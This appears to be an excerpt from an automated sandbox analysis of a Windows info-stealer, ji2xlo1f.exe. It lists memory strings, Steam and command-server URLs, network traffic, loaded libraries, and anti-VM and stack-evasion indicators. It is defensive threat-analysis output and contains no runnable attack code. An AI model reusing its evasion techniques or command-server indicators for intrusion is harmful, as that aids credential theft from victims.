                Source: ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apical
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001672000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900f
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: ji2xlo1f.exe, 00000001.00000003.2413553516.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: ji2xlo1f.exe, 00000001.00000003.2413553516.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: ji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49790 version: TLS 1.2
                Source: ji2xlo1f.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\ji2xlo1f.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ji2xlo1f.exe, 00000001.00000003.2368842615.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368718398.0000000003D47000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2309065675.0000000003D2B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308752580.0000000003D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ji2xlo1f.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\Desktop\ji2xlo1f.exeFile read: C:\Users\user\Desktop\ji2xlo1f.exeJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: ji2xlo1f.exeStatic file information: File size 6289408 > 1048576
                Source: ji2xlo1f.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x5d1000
                Source: ji2xlo1f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp
                Source: ji2xlo1f.exeStatic PE information: section name: .vmp
                Source: ji2xlo1f.exeStatic PE information: section name: .vmp
                Source: ji2xlo1f.exeStatic PE information: section name: .vmp
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F83D9 push FFFFFF8Fh; ret 1_3_016F83DB
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F83D9 push FFFFFF8Fh; ret 1_3_016F83DB
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F83D9 push FFFFFF8Fh; ret 1_3_016F83DB
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016FA6D2 push ebp; retf 1_3_016FA78D
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016FA6D2 push ebp; retf 1_3_016FA78D
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016FA6D2 push ebp; retf 1_3_016FA78D
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F90A6 push ss; retf 1_3_016F90B0
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F90A6 push ss; retf 1_3_016F90B0
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F90A6 push ss; retf 1_3_016F90B0
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9888 push ebp; iretd 1_3_016F9899
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9888 push ebp; iretd 1_3_016F9899
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9888 push ebp; iretd 1_3_016F9899
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F4918 push eax; retf 1_3_016F4919
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
                Source: C:\Users\user\Desktop\ji2xlo1f.exeCode function: 1_3_016F83D9 push FFFFFF8Fh; ret 1_3_016F83DB
                Source: C:\Users\user\Desktop\ji2xlo1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\ji2xlo1f.exeSystem information queried: FirmwareTableInformationJump to behavior
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: F61EF7
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: F32D9D
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: EB5DCB
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: E36B3D
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: EAAEDE
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: 9E7BFF
                Source: C:\Users\user\Desktop\ji2xlo1f.exeAPI/Special instruction interceptor: Address: ADC48C
                Source: C:\Users\user\Desktop\ji2xlo1f.exe TID: 5264Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exe TID: 5264Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ji2xlo1f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
